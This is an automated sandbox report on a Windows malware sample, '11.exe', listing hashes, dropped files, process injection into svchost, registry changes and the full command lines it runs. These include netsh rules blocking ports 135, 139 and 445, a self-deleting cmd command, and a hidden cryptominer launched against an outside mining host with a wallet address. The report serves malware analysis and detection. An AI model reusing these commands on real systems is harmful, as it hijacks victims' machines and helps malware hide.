Analysis
- max time kernel: 37s
- max time network: 133s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 07-05-2021 13:05

Static task: static1
Behavioral task: behavioral1 (Sample: 11.exe, Resource: win7v20210410)
Behavioral task: behavioral2 (Sample: 11.exe, Resource: win10v20210410)
General
- Target: 11.exe
- Size: 1.4MB
- MD5: 1fc1c860e86a8fbc2021d2567d62f703
- SHA1: 42ea2c9f4548614574dff36e019ae1cbc68b54e3
- SHA256: 76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
- SHA512: fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  Processes (pid, process):
  1992  wudfhosts.exe
- Sets DLL path for service in the registry (2 TTPs)
- Yara rule hits (resource, yara_rule):
  C:\Windows\Cursors\wudfhosts.exe  upx
  C:\Windows\Cursors\WUDFhosts.exe  upx
  \Windows\Cursors\WUDFhosts.exe  upx
- Deletes itself (1 IoC)
  Processes (pid, process):
  332  cmd.exe
- Loads dropped DLL (2 IoCs)
  Processes (pid, process):
  1388  svchost.exe
  396  svchost.exe
- Drops file in System32 directory (2 IoCs)
  Processes (description, ioc, process):
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat  svchost.exe
  File created  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Update[1].txt  svchost.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes (description, pid, process, target process):
  PID 1388 set thread context of 396  1388  svchost.exe  svchost.exe
- Drops file in Windows directory (5 IoCs)
  Processes (description, ioc, process):
  File created  C:\Windows\Help\active_desktop_render.dll  11.exe
  File opened for modification  C:\Windows\Cursors\WUDFhosts.exe  11.exe
  File created  C:\Windows\Cursors\WUDFhosts.exe  11.exe
  File created  C:\Windows\Help\active_desktop_render_New.dll  svchost.exe
  File opened for modification  C:\Windows\Help\active_desktop_render.dll  svchost.exe
- Modifies data under HKEY_USERS (24 IoCs)
  Processes (description, ioc; all 24 entries are by svchost.exe):
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings
  Set value (data)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a070023000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecision = "0"
  Set value (data)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionReason = "1"
  Set value (data)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionTime = 40916c2e4143d701
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecision = "0"
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadNetworkName = "Network"
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionReason = "1"
  Set value (data)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionTime = 40916c2e4143d701
  Key created  \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\32-e2-17-db-d2-77
  Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"
  Set value (data)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes (pid, process, number of entries):
  396  svchost.exe  (5)
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes (description, pid, process):
  Token: SeRestorePrivilege  396  svchost.exe
  Token: SeBackupPrivilege  396  svchost.exe
  Token: SeSecurityPrivilege  396  svchost.exe
  Token: SeTakeOwnershipPrivilege  396  svchost.exe
  Token: SeLockMemoryPrivilege  1992  wudfhosts.exe
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes (pid, process, number of entries):
  1996  11.exe  (1)
  1388  svchost.exe  (1)
  396  svchost.exe  (2)
- Suspicious use of WriteProcessMemory (63 IoCs)
  Processes (source pid and process, target pid and process, number of identical entries):
  1996 11.exe wrote to memory of 1472 netsh.exe  (4)
  1996 11.exe wrote to memory of 1968 netsh.exe  (4)
  1996 11.exe wrote to memory of 1748 netsh.exe  (4)
  1996 11.exe wrote to memory of 484 netsh.exe  (4)
  1996 11.exe wrote to memory of 1904 netsh.exe  (4)
  1996 11.exe wrote to memory of 1628 netsh.exe  (4)
  1996 11.exe wrote to memory of 284 netsh.exe  (4)
  1996 11.exe wrote to memory of 1156 netsh.exe  (4)
  1996 11.exe wrote to memory of 1984 netsh.exe  (4)
  1996 11.exe wrote to memory of 1800 netsh.exe  (4)
  1996 11.exe wrote to memory of 340 netsh.exe  (4)
  1996 11.exe wrote to memory of 332 cmd.exe  (4)
  1388 svchost.exe wrote to memory of 396 svchost.exe  (11)
  396 svchost.exe wrote to memory of 1992 wudfhosts.exe  (4)
Processes
- C:\Users\Admin\AppData\Local\Temp\11.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\11.exe"
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\netsh.exe
    Command line: netsh ipsec static add policy name=Block
  - C:\Windows\SysWOW64\netsh.exe
    Command line: netsh ipsec static add filterlist name=Filter1
  - C:\Windows\SysWOW64\netsh.exe
    Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  - C:\Windows\SysWOW64\netsh.exe
    Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  - C:\Windows\SysWOW64\netsh.exe
    Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  - C:\Windows\SysWOW64\netsh.exe
    Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  - C:\Windows\SysWOW64\netsh.exe
    Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  - C:\Windows\SysWOW64\netsh.exe
    Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  - C:\Windows\SysWOW64\netsh.exe
    Command line: netsh ipsec static add filteraction name=FilteraAtion1 action=block
  - C:\Windows\SysWOW64\netsh.exe
    Command line: netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
  - C:\Windows\SysWOW64\netsh.exe
    Command line: netsh ipsec static set policy name=Block assign=y
  - C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\11.exe"
    - Deletes itself
- C:\Windows\SysWOW64\svchost.exe
  Command line: C:\Windows\SysWOW64\svchost.exe -k GraphicsPerf_SvcsGroup
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\svchost.exe
    Command line: C:\Windows\system32\svchost.exe
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - C:\Windows\Cursors\wudfhosts.exe
      Command line: C:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S3
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Windows\Cursors\WUDFhosts.exe (also listed as C:\Windows\Cursors\wudfhosts.exe and \Windows\Cursors\WUDFhosts.exe, with identical hashes)
  MD5: 4a72e30c0a582b082030adfd8345014f
  SHA1: 2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
  SHA256: e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
  SHA512: 8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
- \??\c:\windows\help\active_desktop_render.dll (also listed as \Windows\Help\active_desktop_render.dll, with identical hashes)
  MD5: 14e2b194b652d4fd912404775a6ae898
  SHA1: e93f529bb61e12c41426cb2b86176bf0af387c09
  SHA256: 24ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
  SHA512: b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6